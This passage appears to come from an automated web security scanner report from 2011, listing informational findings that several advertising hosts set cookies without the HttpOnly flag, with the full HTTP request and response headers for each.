Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:16 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64663; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^1^1304949736^1304949736; expires=Mon, 16-May-2011 14:02:16 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...

10.85. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

rdk
rdk15
ses15
csi15

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.js?cb=0.14613070245832205&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^1; csi15=3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64389; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304950010^1304950010&3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:06:50 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...

10.86. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

rdk
rdk2
ses2
csi2

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-2.js?cb=0.7725758128799498&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64381; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^2^1304949680^1304950018&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:06:58 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...

10.87. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

ruid
rsid
rdk
rdk15
ses15
csi15

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-15.js?cb=0.2465566643513739 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:24 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154dab7990adc1d6f3372c12^9^1304949684^2915161843; expires=Sun, 07-Aug-2011 14:01:24 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64715; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949684^1304949684; expires=Mon, 16-May-2011 14:01:24 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2029

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...

10.88. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

rdk
rdk2
ses2
csi2

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-2.js?cb=0.004363113781437278 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk=7856/12590; rdk2=0; ses2=12590^1; csi2=3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:12 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64607; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3200913.js^1^1304949792^1304949792&3196046.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:03:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2027

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200913"
...[SNIP]...

10.89. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26633-9.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26633-9.js?cb=0.8043483311776072 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7858/13549; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64709; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi9=3151664.js^1^1304949690^1304949690; expires=Mon, 16-May-2011 14:01:30 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2402

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151664"
...[SNIP]...

10.90. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8201/13264/25249-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8201/13264/25249-15.js?cb=0.48162996326573193 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8201/13264; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64618; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949781^1304949781&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:03:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2198

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...

10.91. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/plain
Date: Mon, 09 May 2011 13:59:26 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Wed, 01-May-2041 13:59:26 GMT
X-Brilig-D: D=9657
Content-Length: 0
Connection: keep-alive


10.92. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /B08725/b3/0/3/1008211/17329585.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /B08725/b3/0/3/1008211/17329585.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.orlandosentinel.com%252Fbusiness%252Fos-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253FSite%253Dorlandosentinel.com%2526channel%253DOrlando%252520Sentinel%25253Abusiness%2526keyword%253D%2526_rsiL%253D0%26DM_CAT%3DOrlando%2520Sentinel%253Abusiness%26DM_EOM%3D1&C=B08725 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
